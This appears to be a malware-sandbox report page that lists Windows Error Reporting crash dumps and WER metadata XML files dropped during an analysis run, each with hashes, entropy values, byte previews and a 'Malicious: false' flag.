                          Preview:MDMP..a..... .......*..f....................................<... .......$ ...@..........`.......8...........T............)..............\...........H ..............................................................................eJ....... ......GenuineIntel............T.......t...)..f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD45.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.6820403288070755
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbdJ5c/5oK6YDc0ngmfHNV9rewSS5aMA2m:R6l7wVeJdJexN6YDc0ngmftq0pA2m
                          MD5:EAE642D47F326D3DED5A429E39BAF108
                          SHA1:3629AC9D7D332BAF1C0334E65E8BEB4A707A8BD3
                          SHA-256:B2DCF6EFDEBB37971ABA76378079AE0CD6C813EC7273D47A677EF430993C4A2A
                          SHA-512:8A9EA3468A494825E5155F497CCBF8A35FC74FB92CEE6F63D233F365095C21B396B6A964E89ECB772D867A1DDD2D54F138530F2C8AA422440F2BE2101023ABA9
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.4.4.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERADC3.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8378
                          Entropy (8bit):3.6926520536952654
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJFr616YNXSU65tgmfZBo2prL89brssf0z5m:R6lXJp616YtSU65tgmf/oPr/f5
                          MD5:044131190BAA88153A3A5699D6CFD11D
                          SHA1:D69874C5712C0309736DA8CB6899B3FDFE3249C7
                          SHA-256:416418B133207F9501C853FC5622F3B7C014F3FD477C111F33C3AF17ECFE9969
                          SHA-512:1A5DFDD8A1625771DC76CE0DA2C22844523E158D5497DEF12344ED08E366433C40018FA26F3CB108EB1DB1B19A83DB979099B8DB98D40448772AFDFC6B49EABD
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.2.0.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERADC4.tmp.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566883328274401
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zs3Jg771I9GhWpW8VYooYm8M4JFKlnOtSF1yq8vT0OtCGytf2gd:uIjfZI79w7VpJFKln7WT0fGuf2gd
                          MD5:875F54116352645A26A499380A52B897
                          SHA1:5C46D65568D1CD873E3BBCD57E1947CA300F9A2E
                          SHA-256:B9507B90E2BF0A3DC0ECB3E71A87FA176C1419D1D8680E24112CF050160D5B75
                          SHA-512:BFFDAD847284F47D98CDB8D176D7CA2F698E872DA60FE35A4F44EEA211C8106B4BAEDF0FBF86E696524C9479158BFBA53E391631DEDF023CBC552F3DC07F2131
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474307" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE21.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.46275212136694
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zs3Jg77aI9GhWpW8VYQYm8M4JSDuFc+q8vMDCmLdd:uIjfZI7ow7V0JGKVmLdd
                          MD5:9B48EE6B901F24222034BA9E24E70CDA
                          SHA1:2405900ACBEB4D8EBABCA08C996AB20CDEACEFD0
                          SHA-256:7562AF8BAF56F4371818CC130823136435863AD83ABAEF94F10306E5ACD5C9DD
                          SHA-512:406E9445F9A3EF554FD0918E4F8741A43C900EF1CC4FEF0E9894B95F91917426DB33B3566CC7D613576E45A596123FD2A49537819E2ABA348164DF51B59ACA39
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474307" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3B0.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:03:27 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):242062
                          Entropy (8bit):4.024825133265541
                          Encrypted:false
                          SSDEEP:1536:4j09aAjUAVEJ/nxKiMfg4rD+HCDAtTzguBojRRapN4uE2aOqSVX7VqMLTg68v:4j2PlPKHERc4uEqqyHLTg68
                          MD5:4F565758407DCD6291335FA5B68F16DE
                          SHA1:864232BF1440392EB25E40DD02A8A76D110FDE77
                          SHA-256:20279F9D6D2D00B5B08B92C3ECF22754115F88A423BD483C1051DE7DCA41CFBB
                          SHA-512:80E73E801D6AFF7AF1E69FC24F1184812962850B9DE36362952779253D293C30A1A3D201D839587F87B17F7309BFF85D6B7D7F1C052D7933AC938F684BE1D3E3
                          Malicious:false
                          Preview:MDMP..a..... ..........f....................................<... .......4 ...@..........`.......8...........T............)..............\...........H ..............................................................................eJ....... ......GenuineIntel............T....... ......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC42D.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7414
                          Entropy (8bit):3.682057537562879
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbW88vR1S6YDURsvgmfHNV9rewSS5aMOcuZm:R6l7wVeJW88vW6YDUSgmftq0pOcEm
                          MD5:2A18F3700EF4365269B568145EC267EA
                          SHA1:9A24A4C5C221E9D298D8EED57F2ED2E50AED70B3
                          SHA-256:7A56F0CD3147600DF0865437B0F5B6388018F29554D1DE8664E23127CCD449B2
                          SHA-512:4C1B4AFF4C577AF5BD5C4BAFC18C0D76539B1D32F9141040C145990EC0F045EE68FB07931DF6BF061E0E9ED2ADA744A48AEBAD5DEF7ACB6DC0EAC5D0ACA20F70
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.0.8.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC48C.tmp.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.563278144410297
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYc/Ym8M4JFKlnOtSFeUwjyq8vT0Otsytfyd:uIjfOI79w7VNiJFKlnU7jWT0lufyd
                          MD5:58A56A1C6E53BD062D8E8936B308A3F4
                          SHA1:678C98D07352AB9AE273165A25BE6905E07578EC
                          SHA-256:30665BF41867F939988DCB178BE630EADE4FC17368348D034474C159755E1426
                          SHA-512:DF36694652214D5B556F8ADB40E2B424A8E81D353399CE7826C1DC2D25D02980E606E19A9ACC6F8C7C5FE25AF8B291942415C9DBF01802CC952C18DF9323BB39
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC612.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8378
                          Entropy (8bit):3.693251998712331
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJKW6v6YmWSUf3WgmfZBo2pr189bszsfeEm:R6lXJ76v6YfSUf3Wgmf/oBsYf0
                          MD5:0367EE54B59CDD3E14A640257697EFE2
                          SHA1:72F6C62D62D9FC26887F71EA19F99D27F5623AB4
                          SHA-256:9C6E68661D19306312C28D076B272DE8F0E759C4B7F5E71DF1E232E795153C6A
                          SHA-512:2E8EF8F437D8BBAC53EFF3899A3D3FDECE50BBA9AA9A3E3B83904CA09D39512FF850FDEF60D25D9CC80068EA88C31268C46F14A95277F838EDABBD783C55B01E
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.9.6.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC661.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.4585120067582205
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VYCYm8M4JSDuFmI+q8vMDpmLfd:uIjfOI7ow7VyJXKqmLfd
                          MD5:ABECA0C77024EB6B49ECC86969A16A8B
                          SHA1:D8564B97C3BA991456B95BA09BDF0991ACAC4989
                          SHA-256:C41125A30FA044AF18D321C03E290634B9C943B5FF54C859705DD16E9D3E6A22
                          SHA-512:BE4A40A7AEEB8BCE8B8532440AC1CEB44F5D011B5946FDEFEE3F55E887409DEADB0651F168E8602E8CC47E79562AF58456E353DB53451506E03F3464DF0A752D
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2AF.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:03:39 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):244822
                          Entropy (8bit):4.013179212382674
                          Encrypted:false
                          SSDEEP:3072:V7YCRgdLEwOaPupecnc4uEqlylMLTgr1:V7YtBEwsecnc4oyoTgr
                          MD5:317D608389DA833704AE9F411DBE6792
                          SHA1:A037471138BCAB1FB4A3489159DA9EBDBBFF3CE2
                          SHA-256:160FA4F3962CA922442EE7F7008ADBB8F7F2FB9D7942806D29036D8DED3CBCC6
                          SHA-512:1716DCDD433A415E49FE4DBE584E0419E8BFB6233326C28821341BF99DAE217103BC1B97C0876237FBD25D4A1DF18A0EE3308D1181962EA10DD03A0EE6728B94
                          Malicious:false
                          Preview:MDMP..a..... ..........f....................................<... ........ ...@..........`.......8...........T............)..f...........\...........H ..............................................................................eJ....... ......GenuineIntel............T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4E2.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.6838938464285453
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbtR0X8P8A56M/16YD5FgmfHNV9rewSS5aM5Rm:R6l7wVeJr0Xcg+6YD5Fgmftq0p5Rm
                          MD5:2190C073E85427DDAB25683FB8309B61
                          SHA1:C991E8F9602A24D1473314CDB501C38D21DE57DA
                          SHA-256:E96C56B327943667A8093081F3B30681D7E4CCB1B42C955EA61832B44FB2D0FF
                          SHA-512:58A4BA09263AFC8DC93BE8F7A2E3B41E1C151F8265A346E0628C80B9E0A337D6FA6AA28591530BDCB94886DB9EEEE9D2E0F7FA603EAC4E31C9E1637AA42C6006
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.8.8.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4F2.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8374
                          Entropy (8bit):3.691188298975344
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJ9w6M6Y7vSUXUgegmfZBo2prp89bTcsfZ6Rm:R6lXJq6M6YzSUXUZgmf/o1TvfZ1
                          MD5:0B32AE00C336C9D3C89FDCB145F60379
                          SHA1:EAEEF9DEA0D3E1D07E69D87476A82BB0EA7878C9
                          SHA-256:E2A2755EF403093A2668599DBD9E10E7674FD8D015EA3DA8250762ACBCD022AC
                          SHA-512:AF7DCE1BA1D8BE60B6CE5555BC44543AC7C48FDFDECB37EC50CCA35FFF843EEA5D2F4867AA668184BE4D09A7F7DED724DA03AEC209E35F2BF9005911A0C0F8C1
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.0.<./.P.i.d.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF521.tmp.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566938860223975
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYoYm8M4JFKlnOtSFUyq8vT0OtnKytfsd:uIjfOI79w7VsJFKlnGWT0Xufsd
                          MD5:12742A69F49E210AF52EA3A37FDDF28C
                          SHA1:3B23B31BCFD2DB05A404B08D6C684BED8C9E09C8
                          SHA-256:3D7EC9CBF5FDBA0CDB69D993DB23B598232FC75B1535594AD047517F0212E763
                          SHA-512:96684178EC8EAA337302C930BDC8AC5297297B14E5410A8764C54462BBB49B1AFC2E8C6D64AE31A6C22BDC7D3368C81CE9BE69D7365FA17CFFCB588759E5D5CF
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF570.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.461302366605539
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VY6Ym8M4JSDuFP+q8vMDzmLJd:uIjfOI7ow7V+JdKkmLJd
                          MD5:7A126B66555C2D44659344EB8C982B2A
                          SHA1:1C3BAF0361A28D1BFE5F51B974F461138089290C
                          SHA-256:10EAC96FB82FB03EAAE37D69D4AA4F84056E65CE8B025C3BD5C841C08B5C8AE6
                          SHA-512:87C598529C713B711DAF56C7B0A546CF276C43B77B65F59CC29FCFA1D4DD3324C2F9BBDE1C34B36A3BCF8CE724882E1F3A69B5FDD0D7990C465232486EBDCCD0
                          Malicious:false
